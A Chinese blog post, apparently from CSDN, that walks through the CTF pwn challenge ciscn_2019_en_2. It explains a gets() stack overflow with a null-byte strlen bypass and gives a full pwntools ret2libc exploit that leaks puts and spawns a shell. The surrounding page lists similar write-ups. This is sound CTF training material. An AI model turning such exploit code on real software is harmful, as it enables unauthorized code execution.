ciscn_2019_en_2

最新推荐文章于 2024-06-14 11:20:52 发布
最新推荐文章于 2024-06-14 11:20:52 发布
阅读量1.5k 收藏 1
点赞数 2
分类专栏: BUU-PWN 文章标签: pwn python CTF WriteUp 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123731062
版权

ciscn_2019_en_2

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行。

放进IDA中分析:
在这里插入图片描述

  • begin();:输出一段文字,可以不用看。
  • __isoc99_scanf("%d", &v4);:获取用户输入的选项,2和3没用,直接看1选项。
  • encrypt();:1选项主要函数,跟进查看。

encrypt();
在这里插入图片描述

  • gets(s);:存在栈溢出的可能性。
  • if ( v0 >= strlen(s) ):对用户输入的数据判断了长度。
  • if ( s[x] <= 96 || s[x] > 122 )、if ( s[x] <= 64 || s[x] > 90 )、if ( s[x] > 47 && s[x] <= 57 ):对用户输入的数据分别做对应的加密。

题目思路

  • gets(s);存在栈溢出。
  • \x00绕过strlen(s),形成栈溢出。
  • 泄露puts()地址,打常规ret2libc。

步骤解析

通过第一次的栈溢出泄露出puts()函数的地址

在这里插入图片描述

接着就能通过libc计算出system()/bin/bash的地址

在这里插入图片描述

完整exp

from pwn import *

#start
r = process("../buu/ciscn_2019_en_2")
# r = remote("node4.buuoj.cn",28559)
lib = ELF("../buu/ubuntu18(64).so")
elf = ELF("../buu/ciscn_2019_en_2")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83
main_addr = elf.symbols['main']
ret=0x4006b9

#attack
payload = b'\x00' + b'M'*(0x50+8-1) +p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.recv()
r.sendline(b"1")
r.recv()
r.sendline(payload)
r.recvline()
r.recvline()
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
print("puts_addr: " + hex(puts_addr))

# libc
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b'/bin/sh'))
print("system_addr: " + hex(system_addr))
print("bin_sh_addr" + hex(bin_sh_addr))
# obj = LibcSearcher("puts", puts_addr)
# base_addr = puts_addr >> 24
# base_addr = base_addr << 24
# system_addr = base_addr+ obj.dump("system")        #system 偏移
# bin_sh_addr = base_addr+ obj.dump("str_bin_sh")    #/bin/sh 偏移



#attack2
payload2 = b'\x00' + b'M'*(0x50+8-1) + p64(ret) +p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload2)

r.interactive()
m0sway
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_en_3
fayinq的博客
03-14 431
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
ciscn_2019_ne_5
m0_52231248的博客
11-15 320
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
scada_5.8.3_full_en
08-02
scada_5.8.3_full_en
BUUCTF ciscn_2019_en_2
carol2358的博客
04-09 2230
这题整体的思路是ret2libc 先checksec 理一下题目: 只有功能1是能用的,输入1,来到encrypt函数,输入s,因为后面有strlen,所以\0截断,溢出为0x58 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_l...
【CTF】ciscn_2019_en_2
凉水的博客
01-26 3751
解题思路: 1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分): void encrypt(char *__block,int __edflag) { size_t sVar1; long lVar2; ulong uVar3; undefined8 *puVar4; undefined8 local_58 [9]; ... *(undefined2 *)puVar4 = 0; puts("Input your Plaintext to be encr
[BUUCTF-pwn]——ciscn_2019_en_2
Y_peak的博客
02-10 799
[BUUCTF-pwn]——ciscn_2019_en_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_en_2 题目: 这是一道和之前一摸一样的题,请点击
[CTF]BUUCTF-PWN-ciscn_2019_en_2
weixin_53394081的博客
04-11 247
【CTF】BUUCTF-ciscn_2019_en_2 pwn
[BUUCTF]ciscn_2019_en_2解题思路
ctfpwn的博客
05-08 269
接下来通过计算偏移和libcsearcher拿到libc版本从而泄露system和bin/sh然后栈溢出获得shell。先用ROPgadget --binary fliename --only 'pop|ret' 找找gadgets。通过读c伪代码可以看出先是一个嵌套循环,然后输入v4的值,根据v4值来执行下面的代码。其中的0x4009A0是用来泄露puts函数的地址后返回encrypt函数再次运行。希望思路对各位有所帮助(本人真的很菜),如有不足请各位佬们指点。很明显有个gets函数的栈溢出。
en_rx.rar_V2
09-21
mlx4 en alloc frags for Linux v2.13.6.
en_netdev.rar_V2
09-20
must be called with local bh disable()d for Linux v2.13.6.
N140HCE_EN2校色文件
04-02
7500k色温红蜘蛛校色
BUUCTF 刷题 ciscn_2019_en_21
Helloity的博客
02-07 563
ctf刷题
BUUCTF pwn——ciscn_2019_en_2
CNS-Enterprise BCC-1701-J
04-05 125
BUUCTF 做题练习
人脸识别系统---人脸对比
最新发布
2303_77278243的博客
06-14 892
def select_image(): #定义选择图片的函数#指明label_var不是一个局部变量也不是全局变量,而是外部函数s1的参数。这样,select_image函数就可以修改s1函数的参数#弹出选择文件的对话框,以及被选择文件的类型file_path = filedialog.askopenfilename(title="选择图片",filetypes=(("图片文件", "*.png;*.jpg;*.jpeg;*.bmp"),("所有文件", "*.*")))#如果选择了文件。
vi_attr_send_end_en
12-17
vi_attr_send_end_en是指在视觉识别方面的属性发送结束。在计算机视觉领域,vi_attr_send_end_en表示当一个视觉识别系统完成了对特定对象或场景的识别和分析,并且将相应的属性信息发送结束。这意味着系统已经提取出了对象或场景的关键属性,并且将这些属性信息进行了发送或保存,以便后续的处理和应用。 vi_attr_send_end_en的出现标志着视觉识别过程的完成,系统可以根据发送结束的属性信息,进行各种应用,比如目标跟踪、图像分割、智能驾驶、安防监控等。这种属性信息可以包括对象的位置、轮廓、颜色、纹理等特征,以及场景的光照条件、环境背景等属性。 vi_attr_send_end_en的应用非常广泛,它可以帮助机器人识别和抓取特定物体,协助智能汽车进行道路识别和导航,支持智能安防系统进行异常行为检测和预警,还可以帮助医疗影像系统对疾病进行诊断和分析等等。 总之,vi_attr_send_end_en代表了对视觉识别过程的收尾,是计算机视觉领域中一个非常重要的环节,对于提高视觉识别系统的精度和效率,以及推动人工智能技术的发展都有着重要的意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值